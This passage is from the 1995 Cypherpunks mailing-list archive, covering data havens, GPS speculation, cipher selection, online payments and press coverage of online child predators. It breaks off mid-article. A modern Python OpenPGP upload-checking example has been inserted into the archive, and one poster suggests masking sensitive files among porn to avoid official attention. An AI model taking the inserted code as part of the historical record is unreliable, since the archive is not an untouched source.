> > - -- > ============================================================================== > skaplin at skypoint.com | Finger skaplin at infinity.c2.org for > | a listing of crypto related files > PGP encrypted mail is accepted and | available on my auto-responder. > preferred. | (Yes...the faqs are there!) > | > E-mail key at four11.com for PGP Key or | "...vidi vici veni" - Overheard > Finger skaplin at mirage.skypoint.com | outside a Roman brothel. > ============================================================================== > Be careful when playing under the anvil tree. > > 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig! From unicorn at access.digex.net Wed Jan 11 08:56:21 1995 From: unicorn at access.digex.net (Black Unicorn) Date: Wed, 11 Jan 95 08:56:21 PST Subject: Data Haven problems In-Reply-To: <9501090448.AA14477@anchor.ho.att.com> Message-ID: On Sun, 8 Jan 1995 wcs at anchor.ho.att.com wrote: > Date: Sun, 8 Jan 95 23:48:36 EST > From: wcs at anchor.ho.att.com > To: dfloyd at io.com > Cc: cypherpunks at toad.com > Subject: Re: Data Haven problems > > dfloyd asks for ideas about preventing spamming in data havens, > for the code that he's working on. It's a hard job. > A related problem is how to prevent your data haven from becoming > the porno-ftp site of the week, and either being swamped with > traffic or raided by the Post Office Reactionary Neighborhood Police.
> [Problems of payment schemes and lack of anonymous payment infrastructure deleted] > Some operators may find it useful to limit the amount of data > that can be stored or retrieved by a specific user or site, > though this is less useful with anonymous and pseudonymous remailers > around, since "a specific user" becomes vaguer. > > Filtering by filename and type can also be useful - if you don't allow > files named *.gif and *.jpg, users may be less likely to > spam you with pornography. Namespace control in general is an issue - > do users get to choose filenames, or list directories, or do they > have to know the names of files to retrieve. > Another issue is whether files can only be retrieved by the sender - > probably a local policy issue. To some degree this requires the evaluation of the "authority attention" level the data haven has achieved. If the real sensitive data is more extreme than a porn deposit, (I assume we are talking 'legal' and not kiddie porn BTW) then the spam involved will serve to properly mask, to some degree, stego'd files within the porn. Part of a data haven, it seems to me, will be security by obscurity. Just on the basic level that a haven with all encrypted files will be somewhat secure by obscure, in that the authority most likely to be interested in the data probably will not be attentive. A repository holding some legitimate spam, be it porn or gifs or whatever, is unlikely to attract the level of SERIOUS attention that the sensitive data it contains may warrant. To sum: Spam's usefulness is a function of current authority attention, likely authority attention and authority attention the sensitive data warrants.
> Some sites may only accept encrypted files, which reduces the spam > potential considerably, as well as reducing your exposure to the > porn police, though it's difficult to do anything about files that are > encrypted with a public key whose private key has been posted to the net, > or fake crypto headers in an otherwise unencrypted file, > unless you put in lots more code to check the insides of files and > watch the net for such postings, which is unrealistic. There's also > the problem that PGP and especially RIPEM files are non-stealthy, > and users may not want to leave even keyids in their files. A better policy might be to encrypt all files that are not encrypted, perhaps through some key assignment system. The spam thus adds to the total traffic analysis problem, and the security of the spam is not material. i.e. better encrypted spam than plaintext spam. > Bill > -uni- (Dark) 0 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig! From unicorn at access.digex.net Wed Jan 11 09:17:08 1995 From: unicorn at access.digex.net (Black Unicorn) Date: Wed, 11 Jan 95 09:17:08 PST Subject: Data Haven problems In-Reply-To: Message-ID: On Mon, 9 Jan 1995, Alan Bostick wrote: > Date: Mon, 09 Jan 1995 13:46:11 -0800 > From: Alan Bostick > To: wcs at anchor.ho.att.com, dfloyd at io.com > Cc: cypherpunks at toad.com > Subject: Re: Data Haven problems > > -----BEGIN PGP SIGNED MESSAGE----- > > In article <9501090448.AA14477 at anchor.ho.att.com>, you wrote: > > > Filtering by filename and type can also be useful - if you don't allow > > files named *.gif and *.jpg, users may be less likely to > > spam you with pornography. Namespace control in general is an issue - > > do users get to choose filenames, or list directories, or do they > > have to know the names of files to retrieve.
> > Another issue is whether files can only be retrieved by the sender - > > probably a local policy issue. > > Pornographic images aren't spam _per_se._ What makes them troublesome is > the huge number of people who wish to download them when their > availability is widely known. (My ISP's ftp site is being bogged down > by lots of accesses; it is speculated that these are people trying to > access pornography kept there.) In many ways this shows how publically available porn could just pummel traffic analysis. > > The obvious fix here is the same as the proposed fix for remailer > spamming: charge for access. > > As a (presumably) fixed-location data haven, one would want to be able > to use some kind of anonymous e-money for payment, but one could also > use good, old-fashioned credit card numbers, too. > > The feelthy peexture business might well be the cash cow that keeps a > data-haven/fortress remailer afloat (if that's not too mixed a metaphor). > > | PROOF-READER, n: A malefactor who atones for > Alan Bostick | making your writing nonsense by permitting > abostick at netcom.com | the compositor to make it unintelligible. > finger for PGP public key | Ambrose Bierce, THE DEVIL'S DICTIONARY > Key fingerprint: | > 50 22 FB 46 41 A3 17 9D F7 33 FF E1 4E 1C 89 79 +legal_kludge=off > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.1 > > iQB1AgUBLxGxHOVevBgtmhnpAQEEnAL/blauOWwrahdpEK+NbH4WC5V5fekmUYdg > tT5VU+d2C5PGF9Bm5cXtNlZczbI84f+jsBmxRDlXQAsec56D7M7ZwjBMcp2X8t9Z > +FlsU90fRN3NGbYOK/vlSOmzjPBQxf8A > =gvPB > -----END PGP SIGNATURE----- > 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig! 
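The "Data Haven problems" thread above mentions "fake crypto headers in an otherwise unencrypted file" and the extra code needed "to check the insides of files". The following is an added example, not code from any poster on the list: an intake check for an encrypted-only store that walks the OpenPGP packet headers and measures the entropy of the encrypted body, so a forged header over plaintext is refused. The packet layout follows RFC 4880 (old-format headers are what PGP 2.x wrote); the thresholds, function names and sample files are assumptions constructed for illustration.

```python
import hashlib
import math
from collections import Counter

# OpenPGP packet tags (RFC 4880) that can appear in an encrypted message.
KEY_PACKETS = {1, 3}      # public-key / symmetric-key encrypted session key
DATA_PACKETS = {9, 18}    # symmetrically encrypted data (18 adds integrity protection)
MIN_BODY = 512            # assumed policy: bodies too short to judge are refused
MIN_ENTROPY = 7.2         # assumed threshold in bits/byte; random data approaches 8.0


def shannon_entropy(buf: bytes) -> float:
    """Bits of entropy per byte of buf."""
    if not buf:
        return 0.0
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values())


def read_packet(data: bytes, pos: int):
    """Parse the packet header at pos; return (tag, body_start, body_end) or None."""
    if pos >= len(data) or not data[pos] & 0x80:    # bit 7 is set on every packet
        return None
    first, pos = data[pos], pos + 1
    try:
        if first & 0x40:                            # new format: tag in bits 5-0
            tag, o1 = first & 0x3F, data[pos]
            if o1 < 192:                            # one-octet length
                length, pos = o1, pos + 1
            elif o1 < 224:                          # two-octet length
                length, pos = ((o1 - 192) << 8) + data[pos + 1] + 192, pos + 2
            elif o1 == 255:                         # four-octet length
                length, pos = int.from_bytes(data[pos + 1:pos + 5], "big"), pos + 5
            else:                                   # partial lengths: take the rest
                pos += 1
                length = len(data) - pos
        else:                                       # old format, as written by PGP 2.x
            tag, ltype = (first >> 2) & 0x0F, first & 0x03
            if ltype == 3:                          # indeterminate: body runs to EOF
                length = len(data) - pos
            else:
                size = (1, 2, 4)[ltype]
                length = int.from_bytes(data[pos:pos + size], "big")
                pos += size
    except IndexError:
        return None
    if pos + length > len(data):                    # header or body overruns the file
        return None
    return tag, pos, pos + length


def check_upload(data: bytes):
    """Return (accepted, reason) for a file offered to an encrypted-only store."""
    pos = 0
    while True:
        pkt = read_packet(data, pos)
        if pkt is None:
            return False, "not a well-formed OpenPGP packet stream"
        tag, start, end = pkt
        if tag in KEY_PACKETS:                      # skip session-key packets
            pos = end
            continue
        if tag not in DATA_PACKETS:
            return False, f"packet tag {tag} does not belong to an encrypted message"
        body = data[start:end]
        if len(body) < MIN_BODY:
            return False, "encrypted body too short to assess"
        bits = shannon_entropy(body)
        if bits < MIN_ENTROPY:
            return False, f"body entropy {bits:.2f} bits/byte: header over unencrypted data"
        if end != len(data):
            return False, "trailing data after the encrypted packet"
        return True, f"encrypted packet stream, body entropy {bits:.2f} bits/byte"


def old_packet(tag: int, body: bytes) -> bytes:
    """Old-format packet with a four-octet length (used to build the samples)."""
    return bytes([0x80 | (tag << 2) | 2]) + len(body).to_bytes(4, "big") + body


def stand_in_ciphertext(n: int) -> bytes:
    """Deterministic high-entropy bytes standing in for real ciphertext."""
    blocks = (hashlib.sha256(i.to_bytes(4, "big")).digest() for i in range(n // 32 + 1))
    return b"".join(blocks)[:n]


# Constructed sample uploads, not real PGP output.
SESSION_KEY = old_packet(1, stand_in_ciphertext(140))
GENUINE = SESSION_KEY + old_packet(9, stand_in_ciphertext(4096))
FAKE_HEADER = SESSION_KEY + old_packet(9, b"Plain text hiding behind a forged header. " * 100)
PLAIN_GIF = b"GIF89a" + bytes(600)
TRAILING = GENUINE + b"cleartext appended after the ciphertext"

if __name__ == "__main__":
    for name in ("GENUINE", "FAKE_HEADER", "PLAIN_GIF", "TRAILING"):
        print(f"{name:12} {check_upload(globals()[name])}")
```

A high-entropy body is necessary, not sufficient: compressed data such as a JPEG behind a forged header also passes this check, and nothing here detects a file encrypted to a key whose private half has been posted, the case the thread calls unrealistic to police.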
From jdwilson at gold.chem.hawaii.edu Wed Jan 11 09:23:34 1995 From: jdwilson at gold.chem.hawaii.edu (NetSurfer) Date: Wed, 11 Jan 95 09:23:34 PST Subject: Storm Signals Message-ID: <199501111727.MAA11495@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- > The call up could possibly be related to the repatriacion of the Hatian > boat people or even a continued presence in Hatii. I think Atistede still This past week we had a number of personnel sent to Haiti for the next 6 months. - -NetSurfer #include >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> == = = |James D. Wilson |V.PGP 2.7: 512/E12FCD 1994/03/17 > " " o " |P. O. Box 15432 | finger for full PGP key > " " / \ " |Honolulu, HI 96830 |====================================> \" "/ G \" |Serendipitous Solutions| Also NetSurfer at sersol.com > >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLxQU5yoZzwIn1bdtAQFVCQF/eZvusPABHtYtkIMm/q/AADIcaJtZ1Fna m202XMn6gdjl0j0SQAx9TEW9bt+pOxW+ =OzIN -----END PGP SIGNATURE----- From a.brown at nexor.co.uk Wed Jan 11 09:32:36 1995 From: a.brown at nexor.co.uk (Andy Brown) Date: Wed, 11 Jan 95 09:32:36 PST Subject: Crypto functions In-Reply-To: <199501102230.RAA01492@bb.hks.net> Message-ID: On Tue, 10 Jan 1995, L. Todd Masco wrote: > L. McCarthy noted that I didn't include sapphire, ...talking of which, is sapphire available outside of the USA? I'd quite like to have a look at it. 
- Andy +-------------------------------------------------------------------------+ | Andrew Brown Internet Telephone +44 115 952 0585 | | PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A C0 1F 9F 66 64 02 4C 88 | +-------------------------------------------------------------------------+ From tcmay at netcom.com Wed Jan 11 10:00:33 1995 From: tcmay at netcom.com (Timothy C. May) Date: Wed, 11 Jan 95 10:00:33 PST Subject: Storm Signals In-Reply-To: <199501110842.DAA07468@bb.hks.net> Message-ID: <199501111759.JAA18260@netcom10.netcom.com> L. McCarthy wrote: > Sam Kaplin writes: > > Todd Masco writes: > > > 1: Somebody's roommate (a Green Beret) has been called back into > > > 6 months of active service. He was not told where he'd be. > > > > Perhaps Bosnia? > > I doubt it. The only sort of Bosnian engagement that might make sense would > involve a fairly conspicuous effort with a large number of troops. I can't > see what a few thousand Green Berets could accomplish there. > > Frankly, I'm quite puzzled by these signs. I can't think of any country that > seems due for a quick invasion by the USG, but the increase in granularity of > the GPS information suggests an operation of greater magnitude than just a > strike against terrorists, drug cartels etc. CNN reported on Monday that U.S. troops are being sent back to Somalia to ensure an orderly and safe withdrawal of U.N. peacekeeping forces. This might explain the few thousand Green Berets being sent, if this is so. About the GPS, I have no idea, though it seems plausible. I know this has no Cypherpunks relevance, but I see a lot of speculation, so I thought adding what CNN is reporting might help. --Tim -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From avi at clas.ufl.edu Wed Jan 11 10:42:15 1995 From: avi at clas.ufl.edu (Avi Harris Baumstein) Date: Wed, 11 Jan 95 10:42:15 PST Subject: anti clipper graffiti Message-ID: <199501111841.NAA09940@cutter.clas.ufl.edu> check out: and while you've got mosaic going, check this out on the same server: -avi From paul at poboy.b17c.ingr.com Wed Jan 11 10:59:24 1995 From: paul at poboy.b17c.ingr.com (Paul Robichaux) Date: Wed, 11 Jan 95 10:59:24 PST Subject: Storm Signals In-Reply-To: <199501111759.JAA18260@netcom10.netcom.com> Message-ID: <199501111859.AA02457@poboy.b17c.ingr.com> -----BEGIN PGP SIGNED MESSAGE----- Not relevant to cypherpunks-- just call me Carol Anne-- If I were the DOD, I would set the standard GPS default to selective availability. After all, with SA on military receivers can still get fine positioning data. If someone could come up with a good reason to turn SA off, great, but I wouldn't leave it on otherwise. The scenarios concerning GPS-piloted Cessnas full of nasty stuff come to mind, especially vis-a-vis the North Koreans. They probably don't have accurate IRBMs but they certainly could cobble together a Learjet-based delivery system. - -Paul - -- Paul Robichaux, KD4JZG | Good software engineering doesn't reduce the perobich at ingr.com | amount of work you put into a product; it just Not speaking for Intergraph. | redistributes it differently. 
### http://www.intergraph.com ### From crunch at well.sf.ca.us Wed Jan 11 11:55:59 1995 From: crunch at well.sf.ca.us (John Draper) Date: Wed, 11 Jan 95 11:55:59 PST Subject: Getting on the list Message-ID: <199501111955.LAA29153@well.sf.ca.us> Hi, I've been trying to get back on the Cypherpunks list now for over 3 weeks. Is anyone out there on the list that has the power to get me added? I tried the usual request to cypherpunks-request at toad.com, but haven't been successful. Who is maintaining the list these days? Does it still exist? And why haven't any of my requests been hohored? that's honored... Thanx John D. From cactus at seabsd.hks.net Wed Jan 11 11:59:43 1995 From: cactus at seabsd.hks.net (L. Todd Masco) Date: Wed, 11 Jan 95 11:59:43 PST Subject: Storm Signals In-Reply-To: Message-ID: <199501112004.PAA12969@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Samuel Kaplin wrote: >Perhaps it is two unrelated events. Maybe the Russians are using GPS in >their attack on Chechnya, and the administration decided "Not on our dime." To clarify a little bit: I summarized wrongly. The GPS fine location has not been turned off, the dithering has been turned off. In essence, the GPS fine positioning usually lies in a particular algorithmic way designed to make determining exact locations extremely difficult. In theory, the military GPS units bypass this dithering. Either it doesn't work or there aren't enough military units (I believe the latter is the official story), but GPS fine positioning has been turned off during times like the Iraq massacre and the Haiti invasion so that the military can use civilian units.
In any case, it turns out that the Green Beret in question is being sent to Haiti. It doesn't explain the GPS, tho. There's lots-o-speculation elsewhere on the net. - - -- Todd Masco | "life without caution/ the only worth living / love for a man/ cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich Cactus' Homepage - -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLxP++hNhgovrPB7dAQGUowQAgvqyOzrVxCWnumcPQyPbrWnuxn+017Wf DBM/A5VCqyzj/wpZYgBydBwZknzEYd8vxLdt32j2rlhzswHCHdsvECuN7aer9S7t 69ZlrtPn1UKy5MvTUyAdvxh5Z8Zex1eenyYd8q+favmrAB9UmX4Sh1e4JkYqPRmP is2vZ8DgAIQ= =Lmyl - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLxQ5wCoZzwIn1bdtAQGWPgGAwLlWR8brXeavxwrV4CxvCK1XMZgCY8pq MixVBWLp0eti/cbmDzSS/8x9gle8PUgL =VtmS -----END PGP SIGNATURE----- From strick at versant.com Wed Jan 11 12:23:53 1995 From: strick at versant.com (strick -- henry strickland) Date: Wed, 11 Jan 95 12:23:53 PST Subject: Microsoft TrueName(tm) Message-ID: <199501112023.MAA19659@gwarn.versant.com> brat at apple.com found this somewhere.... strick Microsoft Clarifies Trademark Policies REDMOND, Washington--January 4, 1995--In response to customer inquiries, Microsoft today clarified the naming policy for Bob(tm), its new software product designed for computer beginners. Contrary to rumors, Microsoft will not demand that all persons formerly named "Bob" immediately select new first names. "I don't know where these rumors come from," commented Steve Balmer, Microsoft Executive Vice President for Worldwide Sales and Support. "It's ridiculous to think Microsoft would force people outside the computer industry to change their names. 
We won't, and our licensing policies for people within the industry will be so reasonable that the Justice Department could never question them." Balmer said employees of other computer companies will be given the opportunity to select new names, and will also be offered a licensing option allowing them to continue using their former names at very low cost. The new licensing program, called Microsoft TrueName(tm), offers persons who want to continue being known by the name Bob the option of doing so, with the payment of a small monthly licensing fee and upon signing a release form promising never to use OpenDoc. As an added bonus, Bob name licensees will also be authorized to display the Windows 95 logo on their bodies. Persons choosing not to license the Bob name will be given a 60-day grace period during which they can select another related name. "We're being very lenient in our enforcement of the Bob trademark," said Bill Newkom, Microsoft's Senior Vice President of Law and Corporate Affairs. "People are still free to call themselves Robert, Robby, or even Rob. Bobby however is derivative of Microsoft's trademark and obviously can't be allowed." Microsoft also announced today that Bob(tm) Harbold, its Executive Vice President and Chief Operating Officer, has become the first Microsoft TrueName licensee and will have the Windows 95 logo tattooed to his forehead. From die at pig.die.com Wed Jan 11 13:49:06 1995 From: die at pig.die.com (Dave Emery) Date: Wed, 11 Jan 95 13:49:06 PST Subject: Storm Signals In-Reply-To: <199501111759.JAA18260@netcom10.netcom.com> Message-ID: <9501112147.AA00447@pig.die.com> Tim May writes: > > This might explain the few thousand Green Berets being sent, if this > is so. About the GPS, I have nok idea, though it seems plausible. 
> According to a couple of friends who are evaluating use of GPS for precisely locating radio transmissions the usual selective availability dither is still turned on and there have been no public announcements about any changes in the status of the C/A (public) part of the system. The P code part of the system is only available to the military and announcements about it may not be made from the usual USCG BBS that carries stuff about the civilian signals, but they know nothing about any change in GPS status recently, nor has there been any change in the amount of dither or its (random) nature. Dave Emery From skaplin at mirage.skypoint.com Wed Jan 11 14:29:28 1995 From: skaplin at mirage.skypoint.com (Samuel Kaplin) Date: Wed, 11 Jan 95 14:29:28 PST Subject: FBI and BLACKNET In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In article , you wrote: I hope they took you someplace nice for lunch...You might want to file a FOI request on yourself, just to see how much they censor. ;) They might think you're the ringleader, after all the FBI doesn't buy peons lunch. ;) Sam - -- ============================================================================== skaplin at skypoint.com | Finger skaplin at infinity.c2.org for | a listing of crypto related files PGP encrypted mail is accepted and | available on my auto-responder. preferred. | (Yes...the faqs are there!) | E-mail key at four11.com for PGP Key or | "...vidi vici veni" - Overheard Finger skaplin at mirage.skypoint.com | outside a Roman brothel. ============================================================================== A man wrapped up in himself makes a very small package.
From skaplin at mirage.skypoint.com Wed Jan 11 14:32:29 1995 From: skaplin at mirage.skypoint.com (Samuel Kaplin) Date: Wed, 11 Jan 95 14:32:29 PST Subject: Storm Signals In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In article <199501112004.PAA12969 at bb.hks.net>, you wrote: > to Haiti. It doesn't explain the GPS, tho. There's lots-o-speculation > elsewhere on the net. I wonder if this might be a response to the recent Korean downing of one of our choppers. Hand them all a civilian GPS and say "DON'T GET LOST!!!" Sam - -- ============================================================================== skaplin at skypoint.com | Finger skaplin at infinity.c2.org for | a listing of crypto related files PGP encrypted mail is accepted and | available on my auto-responder. preferred. | (Yes...the faqs are there!) | E-mail key at four11.com for PGP Key or | "...vidi vici veni" - Overheard Finger skaplin at mirage.skypoint.com | outside a Roman brothel. ============================================================================== Back off man, We're scientists!!!
From jya at pipeline.com Wed Jan 11 14:41:28 1995 From: jya at pipeline.com (John Young) Date: Wed, 11 Jan 95 14:41:28 PST Subject: Internet World on Net Security Message-ID: <199501112240.RAA11895@pipe1.pipeline.com> The entire issue of Internet World of February, 1995, is about Internet security, digital cash, encryption, firewalls and more. Here's the contents: Internet World February, 1995 Volume 6 Number 2 Contents BETTER SAFE Danger lurks on the Info Highway. You must take precautions to reduce your risk. By Dave Taylor and Rosalind Resnick GETTING CRYPTIC Phil Zimmermann's PGP gives you powerful encryption to keep your messages safe from prying eyes. Read all about it. By William Stallings SECURING THE ENTERPRISE Connecting your corporation to the Internet can be a security nightmare. Firewalls are the main line of defense. By Alton Hoover BEYOND THE FIREWALL The latest firewall technology not only detects intruders, but strikes back. By Winn Schwartau CASHING IN As Internet commerce expands, a host of companies are vying to establish their systems as the basis for cyberbanking and credit-card transactions. By Lisa Morgan BUSINESS BROWSER New versions of Mosaic with built-in encryption promise to keep your transactions safe. By Richard W. Wiggins UNLAWFUL ENTRY Crackers can feast on your data if you fail to plug your leaky Unix system. By Aaron Weiss IT'S ALIVE! Although the furor has subsided, reports of Clipper's death are greatly exaggerated. The government's controversial eavesdropping effort lives on.
By Steven Vaughan-Nichols BUILDING TRUST The chief executives of Trusted Information Systems - Steve Crocker and Steve Walker - talk about encryption, CyberCash, Clipper, and more. By Jeff Ubois ------ On another topic, Mike Godwin's column, Law of the Net, deals with "Free Speech vs. Sex Discrimination Online." From jya at pipeline.com Wed Jan 11 14:44:36 1995 From: jya at pipeline.com (John Young) Date: Wed, 11 Jan 95 14:44:36 PST Subject: Mastercard Online Message-ID: <199501112244.RAA12115@pipe1.pipeline.com> The New York Times January 10, 1995, D2. Mastercard to Develop On-Line Standard By Saul Hansell Joining a stampede of companies that hope to profit from shopping on computer networks, Mastercard International said yesterday that it would develop standards for its cards to be used on the Internet. Mastercard, an association of banks that is based in New York, said it would use the technology developed by the Netscape Communications Corporation of Mountain View, Calif., a specialist in software for the Internet, the global web of computer networks. The Internet allows a company to make information on its products available to millions of computer users around the world. Increasingly, companies would like to consummate sales using the Internet as well, but the open nature of the network may allow credit card numbers to be stolen. "The problem with the Internet is there is no privacy and no security," said Edward J. Hogan, a senior vice president of Mastercard. The Mastercard plan is one of several attempts to translate credit card numbers into a code before they are sent to merchants selling goods over the network and then on to the credit card companies. Visa International has said it will develop its own encryption system with the Microsoft Corporation. Microsoft has hinted that it may charge a fee for every transaction using its system, though the details have not been announced. 
Netscape and Mastercard say their transaction standards will be openly published and free for other companies to use. Netscape's main business is selling software that allows companies to publish information on the Internet. To expand the market, it gives away or sells for a very small fee software that allows people to view information on the Internet. The company has already included a component to encrypt credit card numbers with its current version. The first merchants to allow purchases using that feature will be part of an electronic shopping service to be introduced by the MCI Communications Corporation later this month. The initial Netscape credit card system allows customers to use any brand of card. It did not involve the cooperation of credit card companies, but rather used existing rules that related to mail and telephone card orders. The agreement with Mastercard will for the first time allow purchases on the Internet with automatic teller machine or debit cards, which withdraw money from checking accounts. Mastercard will likely agree to absorb the losses from fraud on the system. Under the existing Netscape system, merchants selling goods are liable if fraudulent card numbers are used, as are companies that sell goods by mail or telephone. The debit card access and the fraud guarantee are expected to be available by the fall. End From cactus at seabsd.hks.net Wed Jan 11 14:58:08 1995 From: cactus at seabsd.hks.net (L. Todd Masco) Date: Wed, 11 Jan 95 14:58:08 PST Subject: Multiple symetric cyphers Message-ID: <199501112303.SAA14726@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- One of the possible weaknesses in public-key messages is their dependence upon a particular symmetric cypher for the message with the session key being contained in the block encrypted by the antisymmetric cypher. IE, if a weakness in IDEA is discovered, it can be exploited against all PGP messages.
I'm wondering: would the strength be increased by using a randomly selected symmetric cypher? IE, as PGP uses IDEA and RIPEM uses DES/3DES, what if a random cypher were selected from a set of cryptographically strong symmetric cyphers and information about the cypher selected were encrypted in the RSA-encrypted block? I guess this reduces to: do strong cyphers have "signatures" of some sort, by which the type of encryption can be derived? And if so, can this "signature" be reduced by including part (eg, the first and last bytes) of the ciphertext in the RSA block rather than the "clear" cyphertext block? Just a thought, - - -- Todd Masco | "life without caution/ the only worth living / love for a man/ cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich Cactus' Homepage - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] From jya at pipeline.com Wed Jan 11 15:03:46 1995 From: jya at pipeline.com (John Young) Date: Wed, 11 Jan 95 15:03:46 PST Subject: Cybersmut Message-ID: <199501112303.SAA14349@pipe1.pipeline.com> New York Post, January 9, 1995 Front Page, pp. 8, 9. Four articles.
A Post Investigation Computer Sickos Target Your Kids Child-porn perverts roam info-highway Furor Over Cybersmut Molesters With a Modem Kiddie-sex perverts using computers to lure victims By Lou Lumenick and Kieran Crowley City cops are about to start patrolling the information superhighway to hunt down child pornographers and pedophiles who are luring kids through high-tech computer bulletin boards, The Post has learned. "The bulletin boards are a total haven for pedophiles," said Sgt. Richard Perrine, who's forming a new computer investigation unit. There are no names and faces, and a 33-year-old man can pass himself off as a 10-year-old kid." Perrine said the new unit, in the NYPD's Organized Crime Control Bureau, plans to include computer child-pornographers and pedophiles among its targets. "We haven't really solidified our strategy yet," he told The Post. "This is something that's so new, law enforcement is not quite ready for it." Law-enforcement officials say pedophiles are lurking on the nation's three major on-line services, America Online Prodigy and Compuserve where kiddie-sex perverts are using computers to lure victims -- as well as on the worldwide Internet, smaller online services, and locally-operated computer bulletin boards. On-line services are an easy way for pedophiles to meet children anonymously, noted Dyanne Greer, a senior lawyer with the National Center for the Prosecution of Child Abuse. "Many cases are not reported, so I'm not sure anybody is really aware how much this is going on," she said. A Post probe uncovered these on-line horror stories: Westchester computer expert George Telesha pretended to be a 14-year-old girl on America Online and was quickly besieged by perverts sending dirty pictures. A Manhattan computer expert allegedly got a 13-year-old New Jersey boy he met on-line to go skating with him. 
Cops said the man lured the youth into the woods near the boy's home and sexually abused him six times between last July and September. An unemployed Brooklyn computer programmer tried to sodomize a Nevada teen-ager he met on a computer bulletin board. A 27-year-old computer engineer in Cupertino, Calif., allegedly met a 14-year-old boy through America Online. He is charged with handcuffing, shackling and blindfolding the boy and then taking him to his apartment, where he whipped him with a belt, shaved his pubic hair and had sex with him. California man sent pornographic photos via computer to a teen-ager, then sought to have the teen killed to silence him. Such crimes are not easy to investigate or prosecute, officials note. "It's a bigger problem than most people realize," said Mike Brick, director of the Orlando bureau of the Florida State Office of Law Enforcement. "There's a lot of people out there who want to have sex with children. If they hang out at a real playground, a teacher or someone might see them. In the computer playground they can more or less hide in the bushes." A handful of agencies have staffers pose as youngsters to solicit dirty pictures and come-ons, but many don't have the manpower, equipment or inclination to do so on a regular basis. And even if they did, experts say there's probably no way to completely stop on-line perverts -- who constitute a tiny fraction of overall on-line communicators -- short of shutting down the services. And that is not only unlikely, but would rob children and others of a valuable educational resource. The services say they're concerned -- but in no position to play the role of police. AOL spokeswoman Pam McGraw said computer-privacy laws keep her company's hands tied when it comes to the person-to-person type of communication in which porn can be exchanged in electronic "private chat rooms." "Federal law prevents us from monitoring E-mail," McGraw said. "We do our best to prevent misuse of our service." 
She urged AOL customers to report offensive communications -- which are prohibited under company rules -- so the company can warn offenders or eject them from the system. Law-enforcement officials say on-line companies are quick to cut off perverts and help track down and prosecute pedophiles and pornographers. But the crimes still flourish because computers make life simpler for the perverts. Pedophiles can easily pretend to be a child online, or even someone of the opposite sex, to help draw a child into a trap. And they can elude detection by using false names and post office boxes. "Offenders can say they're other kids, then arrange for face-to-face meetings," Greer said. "It's pretty scary when you find out you're dealing with a 47-year-old man instead of the 14-year-old you expected." Greer said some pedophiles have convinced children to pose for pornographic pictures. The pedophiles then trade the pictures with other perverts, or use the pictures to draw in other kids "and break down their inhibitions," she said. End Article 1 Article 2 Photo: CREEP CATCHERS: Special agent Mike Brick (white shirt) of the Florida state police and another agent track a pedophile on the computer. How to protect your children Steps parents can take to stop on-line pedophiles By Lou Lumenick Parents must take the offensive to protect their children from on-line perverts, experts say. "You wouldn't let a young child hang out in a playground or mall alone, so don't let them hang out in the computer playground by themselves," said Mike Brick of the Florida Department of Law Enforcement. "You need to exercise the same caution." So what can a parent do? First of all, experts say talk with someone at your on-line system -- whether it's America Online, Prodigy, Compuserve, Genie Delphi or one of the others. All of them allow users to limit access by children. 
Subscribers to America Online, for instance, can bar their children from the private "chat rooms," where the more sexually explicit conversations take place. Most services will also allow you to disable one-on-one conversations when your child logs on. Then talk with your children. Rule No. 1 is that they must never ever give their real name, address or telephone number to anyone on-line. Rule No. 2 is that they must never ever agree to meet with anyone they encounter on-line -- even if he says he's a kid the same age who lives across the street. He could very well be an adult willing to travel hundreds of miles for a sexual encounter. Beyond that, it's a matter of parental vigilance. "Make the kids teach you how to use the computer," said Dyanne Greer, a senior lawyer with the National Center for the Prosecution of Child Abuse. "Many parents take the attitude, 'Gee, my kids are learning a skill.' That's very true, but you can't be left behind or you won't know what's going on. Many experts recommend moving the computer out of the kids' bedroom into a more central place -- like the living room -- so parents can keep a closer eye on things. "If your kid wants to put the computer in his bedroom closet, I would be very nervous," Brick said. "If you find your children spending a lot of time on the service, you need to pay attention. "If every time you walk into the room, the screen goes dark, check it out. It could be the modern equivalent of kids under the cover with a flashlight reading Uncle Harry's Playboy magazine. Or worse." Brick said telltale signs of porn being downloaded include: "If you have a 100-megabyte drive and it's always full and the kids are demanding more memory. Photos can take a lot of memory. " "If you find floppy disks hidden around the house." "If you need help 